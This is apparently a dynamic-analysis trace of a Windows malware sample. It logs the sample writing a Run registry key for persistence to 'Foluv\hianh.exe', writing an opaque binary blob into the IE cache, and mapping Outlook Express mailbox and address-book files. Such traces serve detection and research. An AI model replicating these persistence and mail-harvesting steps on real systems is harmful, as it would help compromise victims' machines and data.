Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: write and read and execute Type: commit Baseaddress: 2BE0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 1990572440
Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: query and write and read and execute Type: image Baseaddress: 2BF0000 Size: 57344 Protection: read write Mapped to pid: own pid conflicting addresses 1990575656
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1990645314
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990648485
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990655685
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: write and read and execute Type: commit Baseaddress: 2C90000 Size: 2482176 Protection: execute Mapped to pid: own pid success or wait 1990707462
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: write and read and execute Type: commit Baseaddress: 2C90000 Size: 2482176 Protection: execute Mapped to pid: own pid success or wait 1990716750
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: query and write and read and execute Type: image Baseaddress: 2C90000 Size: 2486272 Protection: read write Mapped to pid: own pid conflicting addresses 1990720162
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 90112 Protection: execute Mapped to pid: own pid success or wait 1990806877
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 90112 Protection: execute Mapped to pid: own pid success or wait 1990811387
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: query and write and read and execute Type: image Baseaddress: 6CDF0000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 1990814134
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1990959212
Section loaded Path: \BaseNamedObjects\microsoft_thor_folder_notifyinfo_mappedfile Access: query and write and read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 1991000695
System info queried Type: ProcessInformation success or wait 1991004068
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2F30000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1991010793
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1991689238
Section loaded Path: \NLS\NlsSectionCP20127 Access: read Type: unknown Baseaddress: 2F30000 Size: 69632 Protection: readonly Mapped to pid: own pid success or wait 1992023893
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: E8 C1 69 AB 94 52 1E 42 DD C3 DA FA EB 82 38 2A B0 03 29 3A 73 7F 61 22 EC 5F 7B E6 1F F6 F6 81 FE 5D B8 7D 34 14 36 02 95 58 0C 87 50 BC 83 6D DF 05 38 CE BC 67 16 7D 31 6E 30 C4 6E 8C 79 D4 89 44 F5 FC 05 4C CC 6A 75 74 38 5E 51 74 C5 E3 7A 6D 52 F7 F8 3C 52 43 7E CE B5 41 E0 E8 B0 C8 0D B9 6D 80 success or wait 1992345188
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1992441373
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 4B A0 43 33 C1 56 F2 0D 6D 52 6F D7 8D 83 39 5D C1 F9 66 58 E3 98 C7 F3 71 C2 06 68 82 AF 9D 81 FF BE 63 E1 5F A8 52 D2 90 C3 E9 24 3D 78 5F 5D 79 66 A8 56 C3 F2 73 44 CF E3 1E 10 22 3A CC 01 66 54 46 51 88 FA 51 47 33 1C 46 77 81 CC A8 08 1C 68 AA A3 A2 49 1E 71 ED B4 08 B0 D9 BF FE 80 A5 A4 E0 5E success or wait 1992542998
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: AD 0F E4 12 EE 04 3B C8 AB 15 36 28 0D 06 3B 69 EE 2C 34 F2 B3 4F F9 F3 E9 08 DE AD DF B9 81 B3 8B A0 AD 09 9B FE 6A 6A 2C 25 4A 46 90 80 F1 7A 5E CE 5A 09 5C 0A 51 0B D0 10 EA 6A AB DF AF 4A 51 89 6E BB 3B 58 74 5F 1E 5B 74 DA 80 AA 25 47 3B 6E AF AE E5 A5 79 4E 8A EF 85 43 27 0B A1 99 F1 53 BD AD success or wait 1992547803
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 40 7A AA FC DC 6F 3E FD A6 8D F1 9E 4D 06 D4 91 0E F6 DF BE 36 13 0E C4 87 9F CC AD BC FA C4 B3 7D 98 B6 30 8E A3 CB 3C 56 8D AD 7D CD E4 9B 60 6C B4 0B DE 81 11 A6 60 25 10 A9 B5 A4 67 DD 5B 28 D1 CF 5E AD AF 85 88 49 2A 72 F6 11 20 D3 A0 36 42 9A B4 20 69 22 FD 97 B3 EB 12 54 17 66 09 E7 99 79 B4 success or wait 1992550143
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 69 0A 5D 0F E8 28 EF D7 83 3F D5 75 BB 9E B2 D6 1E AB 97 EB C2 FD A9 AA 75 FF 38 73 9F 6E F6 93 64 69 0D 8E 6F 8F 20 72 19 86 E9 9D BF 5A 51 91 56 D2 82 06 3A EB E5 3F BF C8 D7 D5 BE F5 ED 95 12 F1 7F CF A4 41 CF 62 94 06 A1 E1 C8 F7 70 32 0A E9 5B CA CC CD EC 60 E4 22 99 22 D4 56 96 38 EB 55 42 97 success or wait 1992746103
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 06 E6 19 3F F2 33 1F 1F 6E 49 0C 0F BB 9D 5B B0 7B AF AF 26 F2 57 DB 20 4C 9F 88 97 15 B1 77 C8 7A 04 D9 06 C8 77 42 58 16 4B CA F6 87 57 6B 22 61 AC 13 88 B4 D6 0A 4D 35 9C F3 E1 75 40 D0 6C 9F 65 27 7F 56 1C 67 C9 FF 08 21 A7 D0 88 D0 87 B0 C7 CB 4F 2A 32 DA 07 C4 F3 32 9D E1 AF 47 11 B7 86 1D 26 success or wait 1992749014
System info queried Type: ProcessInformation success or wait 1992793032
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: F5 0A 07 02 C0 AD 24 83 3D ED 6B 4A EB 83 BA 5E 31 C1 6A 1F 83 E6 CB 3C 91 E1 9B FA 32 AD 28 4D BC D6 4B EF D1 E2 13 83 C3 4D 11 94 AA 3F 75 87 FC EB 0B 01 DC 20 C0 71 44 74 D8 BF CB 6B 24 CD B0 A4 58 6D C2 8B 7E C5 09 4E 3F F1 B0 C2 23 B4 54 92 9A 21 EA 50 BB 3A 96 14 06 D2 D2 3C 6F F9 D8 EC 83 EE success or wait 1992799817
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2FC0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1992801824
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 99 21 0E BB BA 67 24 15 C4 64 3C 37 3D 6C 54 0B 5A CF FB C6 AC 08 5C 2C 48 C2 7D F6 DE 31 94 AE EA C8 39 B6 06 07 60 63 D4 89 B0 9F 07 53 24 95 12 99 B1 6C A3 0C 8B 73 D5 78 07 8B A1 BB 93 3E 35 3E A8 04 03 F0 A1 92 CA 8B 6F 35 EE BE 33 99 2A 81 23 2D 0F 24 40 0F CA 8C 06 42 D1 E1 19 22 48 4F D4 E4 success or wait 1992900646
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 64 86 61 BB EB F4 CF 9F 97 BF 46 C0 FF F4 19 94 0A 0C 2C 70 41 F3 3F A1 3A 02 E2 32 66 48 39 4C EB 9B 1E 99 D7 79 0F 60 6F C5 1E 58 12 2B 7A 79 AF 0C F0 D5 E9 40 45 1F BC D7 9B A1 DA DB 1B 9A A9 14 1E 42 32 ED 88 A4 FC F1 09 B5 45 26 FC 3B 96 18 25 E2 2D D8 1D 82 69 0F 29 8D 7A 23 60 6C A1 9E E0 CA success or wait 1992967609
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FC0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1992985862
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 2FC0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1992986329
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FC0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1992987764
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 2FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1992988224
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FD0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1992996648
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 2FE0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1992997136
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FE0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 1993028901
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1993029386
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1993030864
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1993031344
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1993042693
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3030000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1993043217
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1993045686
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1993046565
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 1993048493
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1993059979
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1993062698
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 1993065504
System info queried Type: ProcessInformation success or wait 1993083891
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 30D0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1993091206
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1993139700
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 6C 75 A2 8D 31 72 F1 A3 5E 50 ED 39 53 3A 83 BF F9 58 E0 29 83 C5 0A 41 63 38 AF C6 91 CA FA 77 BC 31 B9 46 77 6F 84 DE 5A 3B A7 53 97 1A C5 71 97 B1 0B 98 AC 9A 1E BC B8 CF 89 C0 CB 33 50 E5 23 BC 00 CE FC FB A5 24 2E E5 B2 72 29 36 24 41 36 66 56 C0 12 5C 7E 95 9A B5 D4 FC 7A 5F 20 6E 87 79 F9 E9 success or wait 1993158508
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 55 DF FB 34 21 8E 82 F1 05 A9 DD 6A 09 2C 6C 26 C3 FE 6A 49 3D E4 4E 7E C5 95 D4 28 23 C1 88 3B 1A EC A4 2C 06 3E 00 C0 B3 EF B5 2B F4 4E 8B 88 56 59 A4 7C 94 F7 E4 17 68 95 CF 66 DB 38 4E C2 A1 F8 32 BA B2 66 BE 23 92 07 E9 2F 72 AB 96 14 FF A0 2E AA EF 4C 56 A9 15 5B 33 91 B2 9A 78 B7 19 A9 3D 3A success or wait 1993228423
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 47 16 31 87 DF 4B C8 C1 6E C4 05 8B EC BB 28 A3 3F 2B 4B 09 56 28 69 C3 99 C5 5D 06 F8 85 2E E5 F0 40 A4 C4 47 BF 20 D0 14 70 87 C4 DF 41 7D 63 6F 5A 4C 81 DA B4 C6 4B F3 10 75 C9 16 77 CF 1B 99 60 08 4B 0E 2B D6 67 C0 1A 54 23 93 3F F3 8A 6D 4B 1E BF 28 F0 89 72 42 30 E8 46 C7 0A E3 84 59 1B CB 89 success or wait 1993247261
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: F0 BB 4A AD BD 92 DF 03 56 3C C6 19 5D 67 A4 EB F6 05 92 85 D1 8E 97 0D EA E0 E1 56 BC A4 F5 39 30 89 FB 69 D3 1C BC 0E 35 72 4F 8C 60 CC F7 A8 D5 36 3D AF 44 68 46 05 65 3B C1 9A 20 83 79 0D A5 3D DE 63 47 83 83 5C 9C 5A C7 BC 93 7E 0E A6 89 7F 5E D3 D8 6F 11 2B 84 BD 58 9A 0C 97 09 3C 22 27 84 DF success or wait 1993403227
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: E0 7A AB 29 B6 64 36 09 DC 1C D2 4A 01 94 5D 59 3E 54 E3 69 EA 14 20 AB 88 7C 09 41 6D 20 90 2B 01 41 8B 3D 69 FE 00 11 C3 D7 38 CB 5A 69 08 7C 14 4F 7C 5C 2B BD 43 33 3F 0C 57 95 D3 B2 2B 28 CE F3 8D B1 22 AD 0A FC C2 4A 43 48 15 C3 C1 3C 63 A4 05 F6 BB 26 16 0B 87 8F 39 B9 5A A0 B7 41 22 DF 59 EF success or wait 1993413014
Section loaded Path: C:\WINDOWS\system32\mshtml.dll Access: write and read and execute Type: commit Baseaddress: 30F0000 Size: 5963776 Protection: execute Mapped to pid: own pid success or wait 1993500750
Section loaded Path: C:\WINDOWS\system32\mshtml.dll Access: write and read and execute Type: commit Baseaddress: 30F0000 Size: 5963776 Protection: execute Mapped to pid: own pid success or wait 1993505483
Section loaded Path: C:\WINDOWS\system32\mshtml.dll Access: query and write and read and execute Type: image Baseaddress: 3CEA0000 Size: 5976064 Protection: read write Mapped to pid: own pid success or wait 1993508554
Section loaded Path: \KnownDlls\msls31.dll Access: write and read and execute Type: unknown Baseaddress: 3CEA0000 Size: 5976064 Protection: read write Mapped to pid: own pid object name not found 1993526913
Section loaded Path: C:\WINDOWS\system32\msls31.dll Access: query and write and read and execute Type: image Baseaddress: 30F0000 Size: 167936 Protection: read write Mapped to pid: own pid conflicting addresses 1993531176
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 97 2B F4 DB 30 C7 B2 CF 0A 5C 73 23 48 93 F9 EB 95 0A 71 FC 03 53 82 D6 5E D8 E0 CA D1 01 93 46 AE 54 9D E3 A3 27 13 17 4A B4 26 08 EE F3 94 0D A1 4A 83 36 39 FA 0E 64 DD 21 7C 40 B3 68 B6 62 2E D7 47 F8 30 4E 78 5F C5 8E 45 2C B6 7C B5 5C 13 72 A6 5C ED DC 8D 09 FD E6 1C 98 41 3F B2 4D 7C 3D 98 52 success or wait 1993541289
Section loaded Path: \BaseNamedObjects\#MSHTML#PERF#00000664 Access: write Type: unknown Baseaddress: 30F0000 Size: 167936 Protection: read write Mapped to pid: own pid object name not found 1993614831
System info queried Type: ProcessInformation success or wait 1993622127
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: E4 53 3B CB C0 3B D0 3D 6F 73 3A 50 80 15 EB 8C F7 D2 57 CE 71 89 06 57 D1 01 AA 74 3D CA 2B 8E 04 08 1D 6D 3D A4 60 39 3A 84 24 C4 43 58 1E CB 56 E3 67 F1 3F 44 E7 B8 7D 93 00 04 5A 1A 7F E5 D7 12 BF 2D D9 59 C9 EF C3 24 95 36 08 EB E4 DF 91 A4 28 53 08 DB EE 2D 41 39 81 BE 3E 9A 81 E8 DE 58 DB 3F success or wait 1993637066
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 3160000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1993641116
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 1F B1 4D 5A F6 09 0F E7 6D 47 FC DC 0A 33 7C B7 3B DC DC 41 E0 72 B6 AE 39 0F DD A0 69 48 92 E4 4C 24 C7 C3 6C FD C0 A2 FC EF 53 DD BC 14 01 48 4A 99 E6 AE 6E FE A9 2B 3E 4D 63 09 09 9A BE E9 3D D0 BF 0F DF 1C CF 78 0D 50 72 87 2B D1 FB 5E 60 28 11 B2 1B D3 BB 0F 34 13 23 00 9A 4C 24 14 A8 77 03 43 success or wait 1993862495
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1993872773
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: C6 11 BD 48 D2 BF 05 A0 B4 A0 92 93 52 56 2F 88 C5 E2 F8 64 B1 09 8D DA 73 2B C8 1C 9F FB 67 76 CB 6C 86 92 FD 23 94 F4 90 97 7D C1 DB EE E5 21 5F A6 6F F1 24 48 47 46 76 13 FC ED 9E 7C 77 B5 DA E2 19 1E CD B7 D3 DA A2 06 55 67 E9 7D 1B E7 88 7B 3B 98 02 0B 8B 2D E3 B1 D6 71 C0 2A 31 EA 52 60 6A D4 success or wait 1993895561
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 45 86 E2 26 84 33 7B BD DA 94 CB 05 CB 8E 38 E1 1A 1B DE 83 EE 83 4E C9 E1 6E BB 27 08 B4 DE E0 D2 79 B7 1C 08 B5 14 03 42 DB C2 DD 3B CF 52 BF 5F 38 91 41 49 C0 8F C8 22 A2 F9 B4 11 65 1C 14 45 7B B5 72 41 F9 FD 4B E5 32 08 4B 2B 6D 3E 26 37 A4 CC B7 14 34 C3 63 21 21 88 F3 96 51 8F D3 42 F5 EA 44 success or wait 1993936557
System info queried Type: ProcessInformation success or wait 1993964782
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 31A0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1993972378
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: E5 62 4D 93 43 E1 F9 4D 0E 85 91 3C 76 5A 00 74 E3 0C 35 EC DA 89 05 37 DA C7 8F A4 CC F9 24 DB 1F 41 F3 72 D3 20 A2 40 0C CD 3B 0A D4 1E 74 5D F2 32 D9 72 61 4B 93 12 4F 80 3D 55 CC 2E DC 84 3F 57 24 BF 22 C3 EB 32 2D 50 FA ED B9 0C 68 41 8F 95 83 72 5D C8 4F 72 9E 19 B3 48 7F CC 9D A3 02 1A 3F F7 success or wait 1994009624
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 79 45 F7 35 5A CC E9 5E 7B C6 CD 62 EA 48 85 12 E5 21 ED 74 83 A2 25 AD ED A8 0D DF E0 13 E9 99 CC 88 D8 E7 FB 6C 54 71 C4 67 7F 06 3A 78 B0 85 3D 22 CA 97 70 52 0A F6 2B 6E 67 AE 28 74 C1 99 96 07 82 E4 55 C7 E3 B9 B7 4A 93 76 9D 27 78 50 F3 FB 65 AB E4 D6 C9 04 A4 EA E4 FA 9E A1 E7 7D 7C 2F 8E F1 success or wait 1994015149
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: F0 5E E3 6E FE 69 0C FF 5C A3 90 11 C8 13 B5 D0 62 A1 31 D5 43 DE 59 86 E0 9D 5E EF E4 AB BF 02 0E D1 F7 FE CC DD 16 E1 7B AB B3 8A CE 1B E1 B4 38 4F 6C 56 D5 4C F6 C2 52 4A 54 DC D8 96 CC 7E 66 18 3D B4 78 14 39 AB 58 36 29 17 29 50 8B D7 3C B7 20 A1 74 F5 0F B8 1C 34 43 B4 5A A2 F7 BA 08 97 0D 6F success or wait 1994053967
System info queried Type: ProcessInformation success or wait 1994135371
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 31E0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1994138036
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 75 C6 03 D3 5E 26 EE 7B 44 60 57 30 0C BC 13 BA 64 80 EF 96 96 BD 44 9A F2 B1 16 E5 D3 A0 93 E7 6C 1F 40 6A 9E 12 57 A2 6C 4D 9B B5 F7 79 45 CA 19 05 2A 69 D6 15 12 D9 D2 03 52 C3 D3 84 82 58 A2 76 07 37 72 90 FF 08 F5 99 D8 F1 3C B7 4F 7F 3A FC 74 9D 13 A4 1C D7 15 8A DD 06 B9 73 0E 06 9F 39 65 01 success or wait 1994150802
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: AE 8B F3 EC EC 9A BF BC 8C 2E 61 D2 36 44 41 85 C2 34 10 70 09 23 9A 76 2F 07 EC FD 89 BE B0 DB C5 A5 96 6A CC 13 F7 4A CE 2B 88 D4 4E 37 D2 28 0E E9 92 6D 49 59 0E 6E 69 65 95 6A 1F CB C6 16 EA 3D F2 C7 DA 8F 1F 22 AE BB 5E 11 9C D0 F8 BB FC D5 6E F5 74 18 48 5B 99 81 0F 81 9E 01 C5 69 FA 9B C2 E6 success or wait 1994189667
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: C1 37 E5 67 CB 5E 73 D8 5B 88 F8 C7 95 4E 72 59 D5 95 AC 28 B9 2D 5E CE 6E 7B 87 E8 20 75 95 16 6C 0A D4 9F 3F 4E 01 0B 8D 99 16 A6 2A 6F B4 36 62 33 E6 61 4B CF D8 86 87 18 82 95 4E A5 2B D2 8F 12 9D 09 5C 4E 74 C4 1B A9 38 21 A3 BA 1B FB 8D D5 35 AF 17 4E A3 76 CA DC 22 37 1A 08 C0 4F 49 1C 50 3D success or wait 1994431778
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 3090 Value: 3D DA 00 B7 2C F6 EF 92 FD B5 B9 ED 86 86 47 E7 E3 8E D9 08 D5 5F B3 C6 54 ED 57 A0 E1 31 51 2B 54 BD 62 13 D0 06 7B 2A 0A 3A 35 67 C5 36 B7 40 FE B3 27 0F 87 CF 90 15 2F FC 1E 9A 32 62 5D B0 1E 9E 32 F7 F7 01 70 F8 9C 6F 74 73 4A 2E 1A 68 DF EC 83 31 E8 55 6E 79 CC 1F 30 AC 04 05 BD 18 0F C9 DE 91 success or wait 1994434495
System info queried Type: ProcessInformation success or wait 1994480782
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 3220000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1994483433
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL Access: write and read and execute Type: commit Baseaddress: 3220000 Size: 7569408 Protection: execute Mapped to pid: own pid success or wait 1994589590
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1994591695
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL Access: query and read Type: commit Baseaddress: 3220000 Size: 7569408 Protection: readonly Mapped to pid: own pid success or wait 1994592415
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL Access: write and read and execute Type: commit Baseaddress: 3220000 Size: 7569408 Protection: execute Mapped to pid: own pid success or wait 1994605873
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL Access: query and read Type: commit Baseaddress: 3220000 Size: 7569408 Protection: readonly Mapped to pid: own pid success or wait 1994607073
Section loaded Path: \BaseNamedObjects\Local\!PrivacIE!SharedMem!Counter Access: query and write and read Type: commit Baseaddress: 3220000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 1994629270
